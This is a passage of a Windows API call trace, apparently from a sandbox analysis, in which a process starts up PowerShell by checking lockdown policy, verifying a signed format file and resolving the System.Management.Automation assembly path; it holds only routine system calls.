	[0044.817] CoTaskMemFree (pv=0x1505f3b6bb0) 
	[0044.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0044.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0044.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ceb0) returned 1
	[0044.817] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf90 | out: lpFileInformation=0x184b47cf90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0044.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce70) returned 1
	[0044.817] WldpGetLockdownPolicy () returned 0x0
	[0044.817] GetSystemInfo (in: lpSystemInfo=0x184b47cff0 | out: lpSystemInfo=0x184b47cff0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0044.817] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cef8 | out: phkResult=0x184b47cef8*=0x5b8) returned 0x0
	[0044.817] RegQueryValueExW (in: hKey=0x5b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf48, lpData=0x0, lpcbData=0x184b47cf40*=0x0 | out: lpType=0x184b47cf48*=0x0, lpData=0x0, lpcbData=0x184b47cf40*=0x0) returned 0x2
	[0044.818] RegCloseKey (hKey=0x5b8) returned 0x0
	[0044.818] CloseHandle (hObject=0x3d8) returned 1
	[0044.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0044.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf10) returned 1
	[0044.818] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x15047491600 | out: lpFileInformation=0x15047491600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x441c4)) returned 1
	[0044.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0044.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0044.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ce80) returned 1
	[0044.818] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf60 | out: lpFileInformation=0x184b47cf60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x441c4)) returned 1
	[0044.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce40) returned 1
	[0044.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0044.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0044.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0044.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cd60) returned 1
	[0044.819] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47ce40 | out: lpFileInformation=0x184b47ce40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x441c4)) returned 1
	[0044.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cd20) returned 1
	[0044.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0044.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ccf0) returned 1
	[0044.819] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0044.819] GetFileType (hFile=0x3d8) returned 0x1
	[0044.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cc60) returned 1
	[0044.819] GetFileType (hFile=0x3d8) returned 0x1
	[0044.819] WTGetSignatureInfo () returned 0x0
	[0044.850] CertDuplicateCertificateContext (pCertContext=0x1505fba70a0) returned 0x1505fba70a0
	[0044.850] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cd88 | out: phkResult=0x184b47cd88*=0x5e8) returned 0x0
	[0044.850] RegQueryValueExW (in: hKey=0x5e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x0, lpcbData=0x184b47cdd0*=0x0 | out: lpType=0x184b47cdd8*=0x1, lpData=0x0, lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0044.850] RegQueryValueExW (in: hKey=0x5e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x150474921c8, lpcbData=0x184b47cdd0*=0x56 | out: lpType=0x184b47cdd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0044.850] RegCloseKey (hKey=0x5e8) returned 0x0
	[0044.850] CoTaskMemAlloc (cb=0x10) returned 0x1505fb06ad0
	[0044.850] CoTaskMemAlloc (cb=0x50) returned 0x1505f464e60
	[0044.850] WinVerifyTrust () returned 0x0
	[0044.851] CoTaskMemFree (pv=0x1505f464e60) 
	[0044.851] CoTaskMemFree (pv=0x1505fb06ad0) 
	[0044.851] CertFreeCertificateContext (pCertContext=0x1505fba70a0) returned 1
	[0044.851] CloseHandle (hObject=0x3d8) returned 1
	[0044.868] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8970
	[0044.868] GetSystemDirectoryW (in: lpBuffer=0x1505f3b8970, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0044.868] CoTaskMemFree (pv=0x1505f3b8970) 
	[0044.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0044.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0044.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cfa0) returned 1
	[0044.868] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47d080 | out: lpFileInformation=0x184b47d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0044.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cf60) returned 1
	[0044.868] WldpGetLockdownPolicy () returned 0x0
	[0044.868] GetSystemInfo (in: lpSystemInfo=0x184b47d0e0 | out: lpSystemInfo=0x184b47d0e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0044.869] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cfe8 | out: phkResult=0x184b47cfe8*=0x3d8) returned 0x0
	[0044.869] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47d038, lpData=0x0, lpcbData=0x184b47d030*=0x0 | out: lpType=0x184b47d038*=0x0, lpData=0x0, lpcbData=0x184b47d030*=0x0) returned 0x2
	[0044.869] RegCloseKey (hKey=0x3d8) returned 0x0
	[0044.869] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x82d980b9, Data2=0x4313, Data3=0x41b3, Data4=([0]=0x94, [1]=0xc0, [2]=0xdf, [3]=0xd1, [4]=0xf5, [5]=0x8f, [6]=0xc1, [7]=0x4a))) returned 0x0
	[0044.869] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x8129d536, Data2=0xd8c, Data3=0x4cfb, Data4=([0]=0xb8, [1]=0x5d, [2]=0x28, [3]=0x1, [4]=0x7d, [5]=0xd3, [6]=0x83, [7]=0x4e))) returned 0x0
	[0044.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.888] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x206e363c, Data2=0xb8d0, Data3=0x471f, Data4=([0]=0xa2, [1]=0x86, [2]=0x7b, [3]=0xd3, [4]=0xcc, [5]=0x28, [6]=0x15, [7]=0xd9))) returned 0x0
	[0044.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.890] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x55839cad, Data2=0xd6a1, Data3=0x4bff, Data4=([0]=0x8b, [1]=0x3d, [2]=0x34, [3]=0xd3, [4]=0x14, [5]=0x54, [6]=0x16, [7]=0x31))) returned 0x0
	[0044.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.918] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x338b948d, Data2=0xcadf, Data3=0x4c01, Data4=([0]=0xb9, [1]=0x57, [2]=0x34, [3]=0x1e, [4]=0x42, [5]=0x11, [6]=0x1d, [7]=0xa3))) returned 0x0
	[0044.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.918] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xbc1d8676, Data2=0xd341, Data3=0x476e, Data4=([0]=0x86, [1]=0x40, [2]=0xc7, [3]=0x2e, [4]=0xc8, [5]=0x27, [6]=0xef, [7]=0x1d))) returned 0x0
	[0044.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
